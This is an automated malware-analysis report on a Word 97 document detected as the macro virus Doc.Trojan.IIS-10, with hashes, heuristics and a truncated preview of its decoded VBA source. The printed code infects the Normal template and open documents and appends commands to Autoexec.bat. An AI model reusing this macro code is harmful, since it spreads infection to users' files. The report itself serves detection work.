Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0f0cf33221961773…

MALICIOUS

Office (OLE)

63.0 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: d46b6af12c59b3d905edfdf0683d7220 SHA-1: 0733004c44feaf69d27986c095fa171c8ff45455 SHA-256: 0f0cf332219617731416d07c41b0edf16e07d4d396482f7e653f5324bce376d4
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically a Document_Open macro, which is a common technique for initial execution in malicious documents. The macro attempts to export itself and potentially another component to DLL files and manipulate Autoexec.bat, suggesting it's designed to download and execute a second-stage payload. The ClamAV detection as 'Doc.Trojan.IIS-10' further supports its malicious nature.

Heuristics 3

  • ClamAV: Doc.Trojan.IIS-10 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.IIS-10
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 77686 bytes
SHA-256: 051e4d4cfaf71abeff696368f2cb2805a691dbcab2b5eae1e3834fc769eb4a88
Detection
ClamAV: Doc.Trojan.IIS-10
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Rem MyName = IIS
Close
On Error GoTo MegaJump
    Set prevDocument = NormalTemplate
    Set nextDocument = newDocument
Line Input #1, ms
If UCase(Left(ms, 7)) = "WINDIR=" Then
a = Len(ms)
windir = Mid(ms, 8, a)
GoTo fert
End If
Close
fert:
Close
Open windir & "\system\Log.drv" For Append As #1
Print #1, "+"
Close
NormInstalled = False
ActInstalled = False
NormalTemplate.VBProject.VBComponents(1).Export ("c:\vn.dll")
ActiveDocument.VBProject.VBComponents(1).Export ("c:\vd.dll")
NormInst = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(2, 1)
ActInst = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(2, 1)
If UCase(NormInst) = "REM MYNAME = IIS" Then NormInstalled = True
If UCase(ActInst) = "REM MYNAME = IIS" Then ActInstalled = True

Close
Open "c:\Autoexec.bat" For Append As #12
Close #12
Open "c:\Autoexec.bat" For Input As #12
Do Until EOF(12)
If EOF(12) Then GoTo dss
Line Input #12, a
If a = "@del c:\normalb.dot" Then SetAttr (NormalTemplate.FullName), vbReadOnly
Loop
dss:

If NormInstalled = True And ActIntalled = True Then GoTo esub
If NormInstalled = True Then IW = "C:\vn.dll" Else IW = "C:\Vd.dll"
Open IW For Input As #1
FullCode = "Private Sub Document_Open()" & Chr(13)
Do
Line Input #1, VirCode
Loop Until VirCode = "Private Sub Document_Open()"
Do
If VirCode = "End Sub" Then ess = ess + 1
If ess = 3 Then GoTo jump
Line Input #1, VirCode
If VirCode = "Rem Written by Flitnic" Then GoTo jump
FullCode = FullCode & VirCode & Chr(13)
Loop
jump:
FullCode = FullCode & VirCode & Chr(13)
FullCode = FullCode & "End Sub"
If NormInstalled = False Then
dd = Dir(NormalTemplate.FullName)
If dd = "" Then GoTo AtrNo
at = GetAttr(NormalTemplate.FullName)
If at = 33 Then at = 1
If at = 1 Then
Close
Open "c:\Autoexec.bat" For Append As #12
Close #12
Open "c:\Autoexec.bat" For Input As #12
Do Until EOF(12)
If EOF(12) Then GoTo ds
Line Input #12, a
If a = "@del c:\normalb.dot" Then GoTo fv
Loop
ds:
SetAttr (NormalTemplate.FullName), vbNormal
Documents.Add Template:="", NewTemplate:=False
Lines = ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
ActiveDocument.VBProject.VBComponents(1).CodeModule.DeleteLines 1, Lines
ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 1, FullCode
ActiveDocument.SaveAs FileName:="C:\Normalb.dot", FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False
ActiveDocument.Save
Close #1
Open "c:\No.dat" For Append As #1
Close #1
ActiveDocument.Close
Kill "c:\No.dat"
Close #12
Open "c:\autoexec.bat" For Append As #12
Close #12

FileCopy "c:\Autoexec.bat", "c:\Autoexec.bak"
Close #12
Open "c:\Autoexec.bat" For Append As #12
Print #12, "@Copy /y C:\normalb.dot " & NormalTemplate.FullName
Print #12, "@del c:\normalb.dot"
Print #12, "@Copy /y c:\Autoexec.bak c:\Autoexec.bat"
fv:
Close
Exit Sub
End If
AtrNo:
Lines = NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines
NormalTemplate.VBProject.VBComponents(1).CodeModule.DeleteLines 1, Lines
NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 1, FullCode
dd = Dir(NormalTemplate.FullName)
If dd = "" Then Exit Sub
NormalTemplate.Save
End If
If ActInstalled = False Then
If Mid(ActiveDocument.FullName, 3, 1) = "\" Then
Lines = ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
ActiveDocument.VBProject.VBComponents(1).CodeModule.DeleteLines 1, Lines
ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 1, FullCode
ActiveDocument.Save
Else
Lines = ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
ActiveDocument.VBProject.VBComponents(1).CodeModule.DeleteLines 1, Lines
ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 1, FullCode
End If
End If
e
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.